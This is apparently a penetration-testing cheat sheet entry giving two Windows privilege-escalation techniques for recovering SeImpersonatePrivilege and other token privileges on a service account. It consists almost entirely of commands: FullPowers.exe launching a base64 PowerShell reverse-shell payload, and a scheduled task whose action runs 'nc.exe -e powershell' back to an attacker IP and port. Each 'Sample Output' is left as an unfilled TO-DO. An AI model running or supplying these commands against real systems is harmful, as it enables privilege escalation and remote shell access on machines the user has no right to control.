Abuse #1: Recover SeImpersonatePrivilege
.\FullPowers.exe -c "whoami /priv"
Sample Output:
TO-DO
# Reverse shell (pass the base64-encoded PowerShell payload as the command)
.\FullPowers.exe -c "<POWERSHELL_3_BASE64>"
Sample Output:
TO-DO
Ref: FullPowers
Abuse #2: Recover token privileges via a scheduled task
# Create the list of privileges the task principal should hold (the default set for a service account)
[System.String[]]$Privs = "SeAssignPrimaryTokenPrivilege", "SeAuditPrivilege", "SeChangeNotifyPrivilege", "SeCreateGlobalPrivilege", "SeImpersonatePrivilege", "SeIncreaseQuotaPrivilege", "SeIncreaseWorkingSetPrivilege", "SeTimeZonePrivilege"
Sample Output:
TO-DO
# Create a principal for the task: runs as the service account with the requested privileges
$TaskPrincipal = New-ScheduledTaskPrincipal -UserId "<SERVICE_ACCOUNT>" -LogonType ServiceAccount -RequiredPrivilege $Privs
Sample Output:
TO-DO
# Create an action for the task (inner double quotes are escaped with a backtick)
$TaskAction = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-Exec Bypass -Command `"C:\Windows\Tasks\nc.exe -e powershell <LOCAL_IP> <LOCAL_PORT>`""
Sample Output:
TO-DO
# Register the task with the action and principal defined above
Register-ScheduledTask -Action $TaskAction -TaskName "SomeTask" -Principal $TaskPrincipal
Sample Output:
TO-DO
# Start the task
Start-ScheduledTask -TaskName "SomeTask"
Sample Output:
TO-DO